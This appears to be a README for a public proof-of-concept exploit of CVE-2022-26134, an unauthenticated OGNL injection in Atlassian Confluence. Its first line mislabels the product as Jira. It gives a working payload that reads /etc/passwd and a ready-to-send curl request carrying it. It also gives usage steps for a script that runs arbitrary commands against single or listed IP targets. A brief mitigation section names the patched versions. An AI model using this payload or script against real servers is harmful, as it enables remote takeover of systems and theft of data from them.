Just simple PoC for the Atlassian Jira exploit. Provides code execution for unauthorised user on a server.
CVE-2022-26134 - OGNL injection vulnerability.
Script proof of concept that exploits the remote code execution vulnerability affecting Atlassian Confluence 7.18 and lower products. The OGNL injection vulnerability allows an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance.
${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
Example with CURL command:
curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D"
Then, the result of the command will be reflected in the parameter X-Cmd-Response in the response header.
Mitigations guidelines from vendors
Follow the official recommendations from Atlassian: https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
Atlassian released versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1 which contain a patch for this issue.
1. git clone https://github.com/iveresk/cve-2022-26134.git
2. cd cve-2022-26134
3. pip install -r requirements.txt
4. Ex#1: python3 cve-2022-26134.py <IP> <COMMAND> - command is optional - default will be set as "whoami" just to check if your server is vulnerable
5. Ex#2: 4. Ex#1: python3 cve-2022-26134.py <FILE-WITH-IPs> <COMMAND>
You are free to contact me via Keybase for any details.